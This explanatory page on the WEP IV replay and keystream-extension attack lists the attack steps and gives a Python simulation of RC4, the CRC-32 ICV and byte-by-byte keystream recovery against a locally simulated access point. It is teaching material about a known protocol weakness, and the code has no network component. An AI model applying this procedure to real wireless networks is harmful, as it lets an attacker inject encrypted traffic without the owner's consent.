IV Replay Attack

  1. A message with known (or predictable) plaintext is sent to a wireless client (an email message, an ICMP echo request, etc.)

  2. The attacker sniffs the wireless channel looking for the ciphertext that corresponds to that predicted plaintext

  3. The attacker identifies the known frame and computes the keystream for its IV by XORing the known plaintext (including the 4-byte ICV, which is a CRC-32 of the plaintext) with the captured ciphertext

  4. The attacker can grow that keystream to any size required, because WEP never rejects a reused IV and the access point reveals whether a frame's ICV checked out

    • The attacker builds a frame one byte longer than the known keystream, encrypted with the same IV (an ICMP echo request is ideal, since an accepted frame produces a visible reply)

    • The attacker extends the keystream by one byte by trying all possible values for the last ciphertext byte, i.e. he sends up to 256 ICMP requests

    • Only the correct value yields a frame that passes the ICV check; when it does, the expected response (e.g. the ICMP echo reply) is received, and the new keystream byte is that guess XORed with the last plaintext byte

    • The attacker repeats this process, at a cost of at most 256 frames per byte, until the desired keystream length is obtained
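The whole procedure, simulated end to end as an added example (not code from the original page): a local stand-in for the access point decrypts with RC4 under IV || key and checks the CRC-32 ICV, which plays the role of the ICMP echo reply the page uses as the acceptance signal. The WEP key, the IV, the known plaintext and the `SimulatedAP` oracle are all constructed here; the attacker code only ever sees ciphertext and accept/reject.

```python
"""Simulation of the WEP keystream recovery and extension attack.
Everything (RC4, ICV, the 'access point') runs locally so the example is
self-contained; the real attack observes echo replies over the air instead."""
import os
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with the 3-byte IV || shared key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, transmitted little-endian."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class SimulatedAP:
    """Stand-in for the access point (constructed for this example).
    It decrypts with RC4(IV || key) and checks the ICV; like real WEP it
    never rejects a reused IV, which is what makes the replay possible."""

    def __init__(self, wep_key: bytes):
        self._key = wep_key
        self.frames_checked = 0  # how many attacker frames the oracle saw

    def wep_encrypt(self, iv: bytes, payload: bytes) -> bytes:
        pt = payload + icv(payload)
        return xor(pt, rc4_keystream(iv + self._key, len(pt)))

    def accepts(self, iv: bytes, ciphertext: bytes) -> bool:
        """True iff the frame decrypts to a payload whose ICV matches
        (in the real attack: an ICMP echo reply comes back)."""
        self.frames_checked += 1
        pt = xor(ciphertext, rc4_keystream(iv + self._key, len(ciphertext)))
        return len(pt) >= 4 and icv(pt[:-4]) == pt[-4:]


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Step 3: keystream = (plaintext || ICV) XOR ciphertext."""
    pt = known_plaintext + icv(known_plaintext)
    return xor(pt, ciphertext)


def extend_keystream(ap: SimulatedAP, iv: bytes, ks: bytes) -> bytes:
    """Step 4: grow an n-byte keystream to n+1 bytes with at most 256 frames.
    An (n-3)-byte payload plus its 4-byte ICV is n+1 plaintext bytes; the
    first n are encrypted with the known keystream, the last byte is guessed."""
    n = len(ks)
    payload = bytes(n - 3)          # any payload works; echo data on the page, zeros here
    pt = payload + icv(payload)
    assert len(pt) == n + 1
    prefix = xor(pt[:n], ks)
    for guess in range(256):
        if ap.accepts(iv, prefix + bytes([guess])):
            # Only the correct last ciphertext byte yields a valid ICV, so
            # keystream[n] = guess XOR plaintext[n].
            return ks + bytes([guess ^ pt[n]])
    raise RuntimeError("no guess accepted: the known keystream prefix was wrong")


def demo(target_len: int = 64):
    """Run steps 1-4 against the simulated AP. Returns (keystream matches
    the true RC4 output, number of frames the oracle had to check)."""
    key = os.urandom(13)                      # 104-bit WEP key, unknown to the attacker
    ap = SimulatedAP(key)
    iv = b"\x11\x22\x33"
    known = b"ICMP echo 0123456789"           # constructed known plaintext (step 1)
    captured = ap.wep_encrypt(iv, known)      # what the sniffer sees (step 2)
    ks = recover_keystream(known, captured)   # step 3: 24 bytes of keystream
    while len(ks) < target_len:               # step 4: one byte per round
        ks = extend_keystream(ap, iv, ks)
    return ks == rc4_keystream(iv + key, target_len), ap.frames_checked


if __name__ == "__main__":
    ok, frames = demo()
    print(f"keystream correct: {ok}, frames sent: {frames}")
```

Each round costs at most 256 frames, so growing the keystream from 24 to 64 bytes here needs at most 10240 frames; a keystream long enough for a full 1500-byte frame is reachable in a few hundred thousand frames, after which the attacker can encrypt arbitrary traffic under that IV without ever learning the key.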